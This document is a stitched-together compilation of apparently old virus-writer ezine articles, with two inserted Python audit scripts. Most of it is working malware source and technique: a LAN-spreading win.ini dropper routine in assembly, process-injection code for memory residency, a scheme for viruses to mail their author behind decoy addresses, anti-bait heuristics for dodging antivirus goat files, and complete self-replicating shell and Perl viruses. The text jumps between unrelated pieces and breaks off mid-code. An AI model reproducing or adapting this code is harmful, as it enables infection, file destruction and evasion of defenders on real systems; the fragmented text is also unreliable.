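The two states the cleanup routine looks for (an entry without the dropper, a dropper without the entry) are exactly the ones an administrator can look for as well. This is an added example, not code from the article or from Rammstein: a small win.ini parser that reports run=/load= autostart lines in the [windows] section and, given a listing of the Windows directory, a dropper left behind without its line. The dropper name file.exe is taken from the text above; the ini contents and the directory listings are constructed.

```python
"""Audit win.ini autostart lines and orphaned droppers.

Added example (not from the article). Parses the [windows] section of a
win.ini text and cross-checks it against a directory listing; all inputs
below are constructed.
"""
import ntpath

AUTOSTART_KEYS = ("run", "load")
# Dropper name used in the article's description; assumption for the check.
DROPPER_NAMES = {"file.exe"}


def parse_ini(text: str) -> dict:
    """Minimal INI parser: {section: {key: value}}, names lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def audit_win_ini(ini_text: str, windir_listing) -> list:
    """Return findings as tuples:
       ("autostart", key, command)     run=/load= line with a value
       ("missing_target", key, name)   the line points at a file not on disk
       ("orphan_file", name)           a known dropper on disk with no line
    """
    listing = {n.lower() for n in windir_listing}
    windows = parse_ini(ini_text).get("windows", {})
    findings, referenced = [], set()
    for key in AUTOSTART_KEYS:
        command = windows.get(key, "")
        if not command:
            continue
        findings.append(("autostart", key, command))
        # run= may list several programs separated by spaces or commas
        for token in command.replace(",", " ").split():
            name = ntpath.basename(token).lower()
            referenced.add(name)
            if name not in listing:
                findings.append(("missing_target", key, name))
    for dropper in DROPPER_NAMES:
        if dropper in listing and dropper not in referenced:
            findings.append(("orphan_file", dropper))
    return findings


# Constructed win.ini after the infection described above.
SAMPLE_INFECTED = """[windows]
load=
run=C:\\WINDOWS\\file.exe
NullPort=None

[Desktop]
Wallpaper=(None)
"""

# Constructed win.ini with the entry removed but the dropper left behind.
SAMPLE_ORPHAN = """[windows]
load=
run=
"""

if __name__ == "__main__":
    print(audit_win_ini(SAMPLE_INFECTED, {"win.ini", "file.exe", "calc.exe"}))
    print(audit_win_ini(SAMPLE_ORPHAN, {"win.ini", "file.exe"}))
```

Both run= and load= are checked because either key starts a program at logon on Win9x; the empty load= line in the samples is the normal state and produces no finding.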
Let's see step by step how we can achieve what I explained here:
First of all we will save all the registers, and we can take the delta
handle back into the EBP register, because in this procedure we do not mess
with the stack in any way:
;
RemoteInfection proc ;
pusha ;
call @___1 ;restore the delta handle
@___1: ;
pop ebp ;
sub ebp, offset @___1 ;
Next we need to get the name of the running file itself (the infected file),
so that we can copy it over the net:
push 260 ;get the current file
lea eax, [ebp+myname] ;name
push eax ;
push 0 ;
call [ebp+_GetModuleFileNameA] ;
or eax, eax ;
jz cannot_roam ;
Now we will point to the various possible Windows dir names and create the
name of the dropper and the name of the win.ini file.
droppername = "C:\Windows\file.exe"
winininame = "C:\Windows\win.ini"
myname = "C:\Windows\calc.exe"
Now, let's copy the myname file into the droppername file:
;
push TRUE ;now copy ourself over
push ebx ;the LAN under the new
lea eax, [ebp+myname] ;name into the remote
push eax ;windows directory
call [ebp+_CopyFileA] ;
or eax, eax ;
jz test_next ;
Of course, if the dir name "Windows" was not good, our procedure has to
continue searching through the rest of the Windows dir names:
test_next: ;
@endsz ;go and try the next
cmp byte ptr [esi], 0fh ;windows path!
jne test_paths ;
;
cannot_roam: ;
popa ;
ret ;
windirs db "\Windows", 0 ;
db "\WinNT" , 0 ;
db "\Win" , 0 ;
db "\Win95" , 0 ;
db "\Win98" , 0 ;
db 0fh ;
;
winini db "\Win.ini" , 0 ;
drop db "\file.exe", 0 ;
cmd db "run" , 0 ;
;
myname db 260 dup(0) ;
droppername db 260 dup(0) ;
winininame db 260 dup(0) ;
RemoteInfection endp ;
That was it!!! It is almost unbelievable how small the code is and yet how
powerful it is... Of course, for better success you should combine the above
procedure with some patching code and some hacking code. This is needed
because in the raw form I presented, the code will fail if the network is
protected with passwords or if no resource is shared. So, you would need to
patch some files to get admin rights, but this is not what I speak about in
this article...
I hope this was clear enough, and I expect you to write me back if you were
able to use this or if you discovered other ways, more interesting, more
powerful, more reliable... I await your e-mails at my address:
lordjulus@geocities.com.
ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÙ À¿
³ Final word ³
À¿ ÚÙ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Introduction ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
it's a long time since the first viruses became memory resident. as time
passed we, virus coderz, found new wayz to become memory resident under
Windows platformz. under Win95/98 it was very easy to jump to Ring-0, hook all
file APIz and so stay resident. 100% Win32-compatible residency could be done
by registry tricks or by hooking importz in the Import Table of PEz (so called
per-process residency).
imagine this: you have opened the cmd.exe application (the command
interpreter) and accidentally you execute such a virus. from that time, all
file operationz, even in the cmd.exe process, are hooked and every executable
file opened by the application(z) will be infected. nice, eh?
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Explanation ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
1*,7* I know two wayz to create a handle to any already running process.
for a detailed description of how to work with these APIz look at GriYo's
"EXPLORER *in-memory* infection" article published in 29A#4.
II) the second method is used by Win32.HIV. becoz every process has its own
ID number, valid in the whole system, there's no problem in just randomly
selecting one small number (<4000), checking if it's a valid PID and, if it
is, creating a handle to it.
push PAGE_EXECUTE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push virus_size
push 0 ;allocate enough space
push ebx ;for virus code in
call [ebp + a_VirtualAllocEx - gdelta] ;victim process
test eax,eax
je end_K32_dealloc ;quit if error
mov [ebp + virus_base - gdelta],eax ;save the address
4* first what you have to do is to get the size of kernel32.dll. the code
from Win32.HIV follows:
;Now we have to get the size of K32 in another process. We use the trick
;-> we will search thru the address space for the end of K32 in memory
;and then we will substract the value with the base address, so we will
;get the size
start_parse:
push mbi_size
lea eax,[ebp + mbi - gdelta] ;MBI structure
push eax
push esi
push ebx ;get informations about
call [ebp + a_VirtualQueryEx - gdelta]
test eax,eax ;adress space
je end_K32_patching ;quit if error
;is memory commited?
test dword ptr [ebp + reg_state - gdelta],MEM_COMMIT
je end_parse ;quit if not, end of K32 found
mov eax,[ebp + reg_size - gdelta] ;get size of region
add [ebp + k32_size - gdelta],eax ;add the size to variable
add esi,eax ;make new address
jmp start_parse ;and parse again
end_parse:
sub esi,[ebp + k32_base - gdelta] ;correct to size and save it
mov [ebp + k32_size - gdelta],esi ;(size=k32_end - k32_start)
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push esi
push 0
call [ebp + a_VirtualAlloc - gdelta] ;allocate enough space
test eax,eax ;for K32 in our process
je end_K32_patching
xchg eax,edi
mov [ebp + k32_copy - gdelta],edi ;save the address
┌─────────┐
│ Closin' │
└─────────┘
woow! and the multi-process resident virus is finished. this method is not very difficult to realise, it is small and very efficient. and it worx. if you would like to get more informationz about this, or you will want anything else, contact me!
┌─────────────┐
# Benny / 29A └───────────┐
@ benny_29a@privacyx.com │
@ http://benny29a.cjb.net │
└─────────────────────────┘
VIRII FEEDBACK
by TangentVirii.
INTRO.
I think one of the problems for virus coders is that we usually don't get feedback from our programs. For instance, if we spread a virus, we can't know if it's working well or not. The only way to know if all has worked fine is reading the AVers' texts: if they say something like 'The 5626 Virus is one of the most powerful viruses in the world. It has infected more than 60000 PCs over the world', we know that all is fine. However, these texts aren't very trustworthy. They have lots of lies and other bullshit.
The question is: how can my virus tell me if it's spreading a lot, or not?
MAILING.
In this article we aren't gonna explain how to send a single mail with Win32... we're gonna explain a more original thing: how to do it in a secure way!
If you want to learn how to send a mail with the Win32 API, search the Internet, there's a lot of info about Winsock. You can send mails with MAPI... or you can do it with SMTP, which is more efficient. U CHOOSE.
FEEDBACK.
; mail me a text
push offset emailtext
push offset emailaddress
call sendEmailToMe
It's fine, but what if you don't want to show your email address? You can encrypt the email address too, but a sniffer can capture the email address anyway. How the hell can you hide your address while still allowing your virii to mail you?
DO I NEED IT?
You're not gonna need any of this if you use a secure mail server, because that way you don't have to worry about cops coming after you. If you give your mail to ppl in virus ezines, as 29A members do, and you sign your virus with your handle, it's useless to try to hide your mail because the cops know it.
This info is only useful if you need to hide your mail address but you want the virus emailing you. Else, you can read it anyway, because it can be useful for you in the future.
And if you think it is very dangerous to put your email address in a virii, this article is for you.
EUREKA.
switch(rand()%4){
case 0:
sendMailToMe(text,"stupidmailer@yahoo.com");
break;
case 1:
sendMailToMe(text,"idioticmailer@hotmail.com");
break;
case 2:
sendMailToMe(text,"joe@otherserver.com");
break;
case 3:
sendMailToMe(text,"billgates@microsoft.com");
break;
}
What do you think can happen with this code? If somebody tries to trap you he has to investigate four people, including Bill Gates!!! Can you imagine Bill going to jail because of you? :)
One problem with this code is that you'll only receive one of four mails but... do you need all of them? Think about it: your virus can infect thousands of computers, so it can be a lot!!! And if you make the virus send as many random mails as possible, you can even receive lots of mails.
But four mails aren't enough. You have to add more addresses so AVers and cops can't figure out which one is yours. What about combining them? For example:
switch(rand()%4){
case 0:
person="joe";
break;
case 1:
person="john";
break;
case 2:
person="billgates";
break;
case 3:
person="virusauthor";
break;
}
switch(rand()%4){
case 0:
wsprintf(emailaddress,"%s@yahoo.com",person);
break;
case 1:
wsprintf(emailaddress,"%s@hotmail.com",person);
break;
case 2:
wsprintf(emailaddress,"%s@29a.org",person);
break;
case 3:
wsprintf(emailaddress,"%s@microsoft.com",person);
break;
}
sendMailToMe(text,emailaddress);
Oh! Now you have 4*4 = 16 different mails!!! Do you catch the idea? Using the same system you can create tons of mail addresses on the fly. If you make it realistic, so that almost all the email addresses exist, you can fool the cops a lot!!! However, 16 isn't enough... you have to create more and more email addresses. A system can be:
char user[5]={0,0,0,0,0};
char buffer[]="johnearbilljaneeditotpartgoalredh"
memcpy(user,buffer+(rand()%30),4);
switch(rand()%4){
case 0:
wsprintf(emailaddress,"%s@yahoo.com",user);
break;
case 1:
wsprintf(emailaddress,"%s@hotmail.com",user);
break;
case 2:
wsprintf(emailaddress,"%s@29a.org",user);
break;
case 3:
wsprintf(emailaddress,"%s@microsoft.com",user);
break;
}
john@29a.org
need@microsoft.com
bill@yahoo.com
llja@hotmail.com
goal@yahoo.com
And, of course, just by increasing the buffer array size you can increase the number of email addresses.
Better, if you replace every rand with a time routine, what do you think can happen? You can calculate everything so that on some day all mails are redirected to you, else they go elsewhere, and AVers couldn't figure out what your real mail is!!!
OTHER USES.
BYE.
Any questions, email me. Also, if you have interesting ideas about ALIFE
and viruses, mail me, I want to hear them.
TangentVirii.
tangentvirii@privacyx.com
Win32 Bait Detection
by SnakeByte [ SnakeByte@kryptocrew.de ]
1.) Size
2.) Imported API's
3.) Used DLL's
4.) Data Size
5.) Code Size
6.) Ressources
7.) Repeating Stuff
8.) Misc
1.) Size
Of course, this is the simplest thing we can check for. In a Win32 environment, the size of a file should be at least 30 or 40 KB. I have just two dozen files on my hard drive which are smaller than 40 KB, and these are mainly my own asm projects or those "hax0r" tools delivered with various mIRC scripts. If they generate just 10000 goats, with more than 40 KB each, they need 390 MB, not much when you take a look at today's hard drives, but it will cost them some time to generate them ;)
3.) Used DLL's
Ok, a file uses at least the imports of one DLL: Kernel32.dll *g* But when you take a look at some others, you see that they use 5 or more DLL's. Except for those Visual Basic generated files, they often just use the VB40032.dll or one of those other runtimes, if the author is bad and does not also use the Kernel32.dll API's. So check if there are less than 5 DLL's used; if one of those starts with VB, then it is normally no goat, but a badly coded VB program.
4.) Data Size
Check the size of initialized data in the Optional Header. The Rose bait has here just 1500 bytes, a typical program, whether VB or not, around 12000 bytes! So we can take this as another identifier for baits. Look for this value at offset 20h of the PE Header, which could be easily done ;)
5.) Code Size
We should also check the "Size of Code Section" in the Optional Header; a bait just has a low value here (sure, it has not much code ;) ) but a normal file has 5000 and more. This value can be found at offset 2Ch of the PE Header, so it is easy to check too.
6.) Resources
Every normal file uses resources, like pictures, icons and such things. If we find none, we should not infect the file, because just a goat file has no icon ;) To check this we need to locate the .rdata section and check its size inside the section table. I think 800h bytes is a minimum for a normal file (that's about 1 icon).
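Every heuristic in sections 1 to 6 is read straight from the PE headers, so an analyst preparing goat files can measure in advance which of them a bait would trip and why a virus using these tricks would skip it. The following is an added example, not SnakeByte's code: a small Python parser for the relevant header fields plus the article's thresholds, run against a constructed minimal PE32 image (not a real program) whose values are chosen to trip every check.

```python
import struct


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 image (not a real program): one .text section
    holding an import table that names two DLLs, and no resource directory."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt = struct.pack("<HBBIIIIIIIIIHHHHHHIIIIHHIIIIII",
                      0x10B, 6, 0,                # Magic (PE32), linker version
                      0x200, 0x100, 0,            # SizeOfCode, SizeOfInitializedData, SizeOfUninitializedData
                      0x1000, 0x1000, 0x1000,     # AddressOfEntryPoint, BaseOfCode, BaseOfData
                      0x400000, 0x1000, 0x200,    # ImageBase, SectionAlignment, FileAlignment
                      4, 0, 0, 0, 4, 0,           # OS / image / subsystem versions
                      0, 0x2000, 0x200, 0,        # Win32VersionValue, SizeOfImage, SizeOfHeaders, CheckSum
                      2, 0,                       # Subsystem (GUI), DllCharacteristics
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)  # stack/heap, LoaderFlags, NumberOfRvaAndSizes
    dirs = [(0, 0)] * 16
    dirs[1] = (0x1000, 60)                        # import directory: 3 descriptors at RVA 0x1000
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    sec = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = dos + coff + opt + sec
    body = bytearray(0x200)                       # raw .text data: file offset 0x200 == RVA 0x1000
    for i, name_rva in enumerate((0x1040, 0x1050)):
        struct.pack_into("<IIIII", body, i * 20, 0, 0, 0, name_rva, 0x1060)  # IMAGE_IMPORT_DESCRIPTOR
    body[0x40:0x4D] = b"KERNEL32.dll\0"
    body[0x50:0x5B] = b"USER32.dll\0"
    return headers + b"\0" * (0x200 - len(headers)) + bytes(body)


def _rva_to_offset(rva: int, sections: list) -> int:
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return rva - s["va"] + s["rawptr"]
    raise ValueError(f"RVA {rva:#x} is not inside any section")


def _cstring(data: bytes, off: int) -> str:
    return data[off:data.index(b"\0", off)].decode("ascii", "replace")


def parse_pe(data: bytes) -> dict:
    """Extract the header fields the anti-bait heuristics look at."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    _machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic, = struct.unpack_from("<H", data, opt)
    size_of_code, size_init = struct.unpack_from("<II", data, opt + 4)
    dirs = opt + (0x60 if magic == 0x10B else 0x70)   # data directories: PE32 vs PE32+
    imp_rva, = struct.unpack_from("<I", data, dirs + 1 * 8)       # IMAGE_DIRECTORY_ENTRY_IMPORT
    rsrc_size, = struct.unpack_from("<I", data, dirs + 2 * 8 + 4) # IMAGE_DIRECTORY_ENTRY_RESOURCE size
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, opt + opt_size + i * 40)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "va": va, "rawsize": rawsize, "rawptr": rawptr})
    dlls = []
    if imp_rva:
        off = _rva_to_offset(imp_rva, sections)
        while any(desc := struct.unpack_from("<IIIII", data, off)):  # all-zero descriptor ends the table
            dlls.append(_cstring(data, _rva_to_offset(desc[3], sections)))  # desc[3] is the Name RVA
            off += 20
    return {"file_size": len(data), "size_of_code": size_of_code,
            "size_of_initialized_data": size_init, "resource_size": rsrc_size,
            "dlls": dlls, "sections": [s["name"] for s in sections]}


def bait_indicators(info: dict) -> list:
    """Return the article's heuristics that the file trips; an empty list means it looks like a real program."""
    hits = []
    if info["file_size"] < 40 * 1024:
        hits.append("file size below 40 KB")
    if info["size_of_initialized_data"] < 12000:
        hits.append("SizeOfInitializedData below the ~12000 bytes of a typical program")
    if info["size_of_code"] < 5000:
        hits.append("SizeOfCode below 5000 bytes")
    if info["resource_size"] < 0x800:
        hits.append("resource directory under 800h bytes (not even one icon)")
    uses_vb_runtime = any(d.upper().startswith("VB") for d in info["dlls"])
    if len(info["dlls"]) < 5 and not uses_vb_runtime:
        hits.append("fewer than 5 imported DLLs and no VB runtime")
    return hits


if __name__ == "__main__":
    for hit in bait_indicators(parse_pe(build_sample_pe())):
        print("bait indicator:", hit)
```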
7.) Repeating Stuff
When a goat file generator generates baits, they often have exactly the same size, so check if the current file has the same size as the last one; if this is the case, then don't infect it. Filenames might also follow a pattern when generated with a generator. This is the same as in DOS, they either have names like Goat0001.exe, Goat0002.exe.. or 0001Goat.exe, 0002Goat.exe..
I would say the best method to avoid such files is to check the first and the last digit of the filename (without extension). If they are equal or just differ in one bit, then they should not be infected.
But some goat generators are able to generate baits with different sizes and random filenames, what to do against them? One thing which will repeat are the first bytes of the code, because they just change the size and data. But checking for this would be really hard, because a lot of high level compilers have several routines which get started before the programmer's stuff gets executed. If you store the first 100 bytes in memory, you would also detect HLL programs as baits. So my solution is to read 2000-3000 bytes of the code section and generate a checksum over this part, then you don't need to store a lot of data (but make sure the CRC is a fast one *g*)
8.) Misc
Some might say all these anti-goat tricks are useless, because the AV'er will just NOP them out or write his own replication routine for the virus, which will not have these tricks, but the same poly engine. Sure, this would be bad for us, but what if we generate a checksum over the entire virus code and use it as the main basis number for the random number generator? Then the AV'er has to fear that his routine (or the virus with NOPped out tricks) will generate other variants than your virus and his scan engine might miss some of your viruses.
So just choose some of these tricks, they don't need that many bytes and I think they will be an effort for your virus.
Linux Shell Script Viruses
by SnakeByte [ SnakeByte@kryptocrew.de ]
www.kryptocrew.de/snakebyte
Nowadays as Linux becomes more and more popular, every Linux user starts telling me that there are no viruses for his loved OS. After a long discussion most of them believe me that it is possible to write a virus for Linux, but it's harder for them to spread, because Linux takes more care of access rights than DOS or Windows (there are none *g*). Ok, there are ELF infectors out which carry exploits to gain root, but here I want to talk about more simple viruses, which could also be able to spread once there are more lamers using Linux (and at the moment their number grows). My opinion is that viruses will also be a problem for Linux in the future, because there is more and more commercialism and with commercial products come a lot of inexperienced users which do not know how to keep their system clean. Another reason why I deal with shell script viruses here is that the bash shell script is running on most systems and so we don't have to fear incompatibility. (I don't know how far the scripts presented here are compatible with the C shell or another shell, if anyone tests this, please let me know ;) ) Shell scripts are like batch files in the good old days of DOS, or like VBScript in Windows. They allow the programmer to make routine jobs easier and faster. The scripts get interpreted by the shell and are very powerful. Contrary to DOS, you will find a lot of shell scripts when taking a look at Linux. Shell scripts are for example: /etc/profile, /etc/csh.cshcshrc, some files in /etc/rc.d, files to configure the firewall and many more.
For all Linux newbies: 'vi' is an editor you could use to write these simple scripts (and don't believe anyone who tells you that emacs or joe are better *g*). Use 'chmod <file> +rwxrwxrwx' to make everyone able to read, write and execute the file. To start the script, you simply have to type the filename. (On some systems you need to place a ./ in front of the filename because the current directory is not inside the path value.)
We saw that a shell script virus has a whole range of possible victims. Let's take a look at the most simple form of a shell script virus:
#Overwritter I
for file in *
do
cp $0 $file
done
This script, just a few lines long, copies itself over every file in the current directory. Of course, this method of infecting comes with a lot of damage and should be found very fast, so we need to make everything a bit more tricky.
#Overwritter II
for file in *
do
if test -f $file
then
if test -x $file
then
if test -w $file
then
if grep -s echo $file >.mmm
then
cp $0 $file
fi; fi; fi; fi; fi
done
rm .mmm -f
Here we included some additional checks for the file we want to infect. First, we check if it is a file at all. Then if it is executable and if we got write access. If the file passed all checks, we search the file for the echo command, which is part of most shell scripts (displays something on the screen).
(Because we did not get all scripts this way, we could also do a:
if file $file | grep -s 'Bourne shell script' > /dev/nul ; then )
Because a shell script no longer works after being overwritten, we should think of another infection method. The following code is a prepender I wrote nearly 2 years ago to see if it can be done:
# COCO
head -n 24 $0 > .test
for file in *
do
if test -f $file
then
if test -x $file
then
if test -w $file
then
if grep -s echo $file >.mmm
then
head -n 1 $file >.mm
if grep -s COCO .mm >.mmm
then
rm .mm -f
else
cat $file > .SAVEE
cat .test > $file
cat .SAVEE >> $file
fi; fi; fi; fi; fi
done
rm .test .SAVEE .mmm .mm -f
The # COCO is our infection mark, to see if a file is already infected. (We check this with if grep -s COCO .mm > .mmm.) After this we have the old checks if the file is a good victim. If the file is ok and not infected yet, we copy it into another, hidden file (.SAVEE). Now we replace the original file with the first 24 lines of our shell script file, which is exactly the virus. (We saved them in .test before.) Now we just append the original file to the virus. (cat .SAVEE >> $file) Last but not least, we delete every file we created during the infection.
Now we can start optimizing. This can be done with two goals: one is to reduce the number of lines, the other one is to reduce the number of temporary files we use. The next code is (or is nearly, because I lost the original) the optimized version of COCO, which Antraxx optimized for me some time ago.
# COCO ( 2 ? )
for file in * ; do
if test -f $file && test -x $file && test -w $file ; then
if grep -s echo $file > /dev/nul ; then
head -n 1 $file >.mm
if grep -s COCO .mm > /dev/nul ; then
rm .mm -f ; else
cat $file > .SAVEE
head -n 13 $0 > $file
cat .SAVEE >> $file
fi; fi; fi
done
rm .SAVEE .mm -f
Now we just need 2 temporary files and 13 lines of code. Of course we could stick all lines together into one by separating them with a ;, but this would be unreadable so I will not do this here.
What else does a virus need to be effective? It should not just infect the current directory, but should parse others for victims. (/etc, /bin, /sbin..)
In this example we save the current directory first, which is stored in the variable $path. Then we search the root directory for other directories. If we found one, we change into it and search for shell script files. We infect them with the old method and change to the root directory afterwards. At the end we return to the original directory and remove the files we created.
# COCO 3
xtemp=$pwd
head -n 22 $0 > /.test
for dir in /* ; do
if test -d $dir ; then
cd $dir
for file in * ; do
if test -f $file && test -x $file && test -w $file ; then
if grep -s echo $file > /dev/nul ; then
head -n 1 $file > .mm
if grep -s COCO .mm > /dev/nul ; then
rm .mm -f ; else
cat $file > /.SAVEE
cat /.test > $file
cat /.SAVEE >> $file
fi; fi; fi
done
cd ..
fi
done
cd $xtemp
rm /.test /.SAVEE .mm -f
Not bad for something simple like a shell script, or? Of course we could also search for specific directories and add a payload (message, expand passwd, ping-flood a host, download a backdoor with ftp, etc..), but in this tutorial I will not cover such things. I think it is also possible to use sendmail or any other mail program to send the script around via mail, but as long as most people use Windows, this would not be very effective.
To make this file complete, here is an ELF companion virus:
# Compagnion
for file in * ; do
if test -f $file && test -x $file && test -w $file ; then
if file $file | grep -s 'ELF' > /dev/nul ; then
mv $file .$file
head -n 9 $0 > $file
fi; fi
done
.$0
Perl Viruses
by SnakeByte [ SnakeByte@kryptocrew.de ]
www.kryptocrew.de/snakebyte
Due to the fact that I have to learn Perl for a job, I decided to write a virus in this language. Until this morning I hadn't found a Perl virus source on the web, so I decided to write a little paper about Perl viruses. This tutorial has the same structure as my tutorial about Linux Shell Script Viruses and so I am sure that also Perl newbies (like me ;) ) will understand it. At the moment I did not have a look at the Perl virus I found, because I want to try to produce my own. (Just finished a totally lame overwriter, but decided to start typing this, because I want the reader to follow my steps.)
All code you will see here is tested on a SuSE 7.0 Linux with Perl 5.0005_3 and worked well. I try to make it compatible with other OSes but can't guarantee this.
Ok, let's start with the overwriter I talked about. First the source and then I will explain what it does.
#!/usr/bin/perl
open(File,$0);
@Virus=<File>;
close(File);
The first line is a comment (marked with a #). It is nearly a standard that every Perl file contains the path and file of the Perl interpreter in the first line. On the second line, we open ourselves. The filename of the running script is stored in $0. Then in the third line, we pass the content of our file into the array @Virus. Now, every value of the array (@Virus[1], @Virus[2] ...) contains one line of our file. Because this is all we want to do with our own file, we close it. Then we start a loop to search for files. We pass this loop for all files in the current directory (<*>) and pass their name to $FileName. We open the file for write access (shown by the > before the filename) and simply print our virus over the old file. (If we would want to append instead of overwriting the file, we would use a >>filename instead.) Ok, the file is replaced by the virus, so let's get the next one and do the same...
I think this little code snippet should be very clear now ;)
Let's make it a bit better, so we will not overwrite every file, but just Perl files.
#!/usr/bin/perl
open(File,$0);
@Virus=<File>;
close(File);
The first few lines are known from the previous example. Then follows a huge :) if-construction. Let's see what it does. It filters out all files which we are able to read (-r), to write to (-w) and which are files at all and no directories (-f). Each one of these criteria must be fulfilled, because we appended them together with an &&, which is a logical AND. Then we open the file for read access. (You see, no > before the filename.) We load the entire file to $Temp and close it. Then we check the first (@Temp[0]) and the second line (@Temp[1]) for the word "perl" (cases are not ignored, but till now I found no case ignoring comparison method for strings, but I go on looking *g*), to check if we got a Perl file. The rest is like in the example before. Here are two things we could additionally do to check the files. The one is to see if they are executable (if (-x $FileName)), but since I think that we cannot check this in a Windows environment, and that there are people like me, which start their Perl files with the interpreter and not setting the executable flag on the files, I won't do it. The other check we could do is with the Linux command 'file' to see if a file is a Perl script. But this wouldn't work in Windows either, so I will not do this here.
Ok, I think this made the basics understandable. Now, forget this shitty overwriting stuff and start doing something more serious - prepending:
#!/usr/bin/perl
#PerlDemo # NEW
open(File,$0);
@Virus=<File>;
@Virus=@Virus[0...27]; # NEW
close(File);
This time I marked the new lines, because not much changed. The first change is that we get just the 24 first lines of the currently running (infected) file. This is because otherwise we would also prepend the original file to the one we infect. The second change is that we add the original file to the virus when infecting. So the new file will start with the virus, then an empty line and then the old file, starting with the #!/usr/bin/perl or whatever ;)
The new check for "PerlDemo" is to see if the file has already been infected by us.
Normally I would start to see what can be optimized, but here we can't do much, except trashing the lines together as far as I see:
#!/usr/bin/perl #PerlDemo
open(File,$0); @Virus=<File>; @Virus=@Virus[0...6]; close(File);
foreach $FileName (<*>) { if ((-r $FileName) && (-w $FileName) && (-f $FileName)) {
open(File, "$FileName"); @Temp=<File>; close(File); if ((@Temp[1] =~ "PerlDemo") or
(@Temp[2] =~ "PerlDemo"))
{ if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) { open(File, ">$FileName"); print File
@Virus;
print File @Temp; close (File); } } } }
So this saves us just some carriage returns and is not really cool :P
Let's add some more cool features to our virus like directory travelling.
We will first take a look at downward traveling :
#!/usr/bin/perl
#Perl Virus - Downward Travelling
open(File,$0);
@Virus=<File>;
@Virus=@Virus[0...24];
close(File);
&InfectFile; # NEW
chdir('..'); # NEW
&InfectFile; # NEW
What have we done? The first change that you will notice is that we placed the file-search and infection routine into a sub procedure, which we call two times from the main program. Another change is the chdir('..') which will let us get one directory down. This should work fine on Unix/Linux and DOS/Windows systems, but will cause errors on MacOS, because MacOS uses '::' to get one directory down. Sad but true, Perl is not as portable as we want it to be :P
Another change is inside the check for the file. (@Temp[1] =~ "perl",,i) The ,,i means that we search for the string perl and ignore the upper and lowercases, so we will also find Perl files starting with #C:\Programme\Perl\Perl.exe. A, let's call it a bug, in this virus is that we don't restore the old directory. This is another problem caused by the incompatibility of the different OSes. In Unix/Linux, we can simply get the current path by doing a $CurPath=`pwd`; But this would not work on Win or MacOS. Luckily we can get the OS under which we are running with the $^O variable, which exists since Perl 5.0002. The following code will see if we are on a DOS, Windows, Linux, BSD or Solaris machine.
#!/usr/bin/perl
#Perl Virus - Downward Travelling
open(File,$0);
@Virus=<File>;
@Virus=@Virus[0...30];
close(File);
&InfectFile;
if (($^O =~ "bsd") or ($^O =~ "linux") or ($^O =~ "solaris")) { $OldDir = `pwd` } # NEW
if (($^O =~ "dos") or ($^O =~ "MSWin32")) { $OldDir = `cd` } # NEW
$DotDot = '..'; # NEW
if ($^O =~ "MacOS") { $DotDot = "::" } # NEW
chdir($DotDot); # NEW
&InfectFile;
chdir($OldDir); # NEW
sub InfectFile {
foreach $FileName (<*>) {
if ((-r $FileName) && (-w $FileName) && (-f $FileName)) {
open(File, "$FileName");
@Temp=<File>;
close(File);
if ((@Temp[1] =~ "Virus") or (@Temp[2] =~ "Virus")) {
if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) {
open(File, ">$FileName");
print File @Virus;
print File @Temp;
close (File);
}}}}}
Ok, if the OS is bsd, linux or solaris, we retrieve the current path with the pwd command, which is a normal shell command to retrieve the current path. In Windows we just do this with cd, which is normally used to change directories but can be used to get the path as well. Then we set the two dots to '..' like they are used in nearly every OS, except MacOS, so we change them to '::' if we are running on a Mac. Maybe it would be a better solution to make two checks, one for MacOS, and set the dots, one for DOS, Windows and OS/2 to use cd to retrieve the path and for everything left we use the two dots and pwd to retrieve the path, because there are many more Unix and BSD versions to which Perl is ported and they all have the pwd command.
If we would want to travel upwards, we have the same problem that the different operating systems have different ways to tell us their root directory. Linux has just one /, Windows and DOS have one for every disk A:, B:, C: ... and as far as I know the Mac has none at all.. With the next source I will try to handle all these problems:
#!/usr/bin/perl
# Perl - Get'em'all Virus
open(File,$0);
@Virus=<File>;
@Virus=@Virus[0...46];
close(File);
&InfectFile;
if ($^0 =~ "MacOS") {
chdir('::');
&InfectFile; }
else { if (($^O =~ "dos") or ($^O =~ "MSWin32")) {
$OldDir = `cd`;
chdir('..');
&InfectFile;
chdir('C:\');
&SearchUpperDirectorys;
chdir($OldDir);}
else {
$OldDir = `pwd`;
chdir("/");
&SearchUpperDirectorys;
chdir($OldDir);}}
sub InfectFile {
foreach $FileName (<*>) {
if ((-r $FileName) && (-w $FileName) && (-f $FileName)) {
open(File, "$FileName");
@Temp=<File>;
close(File);
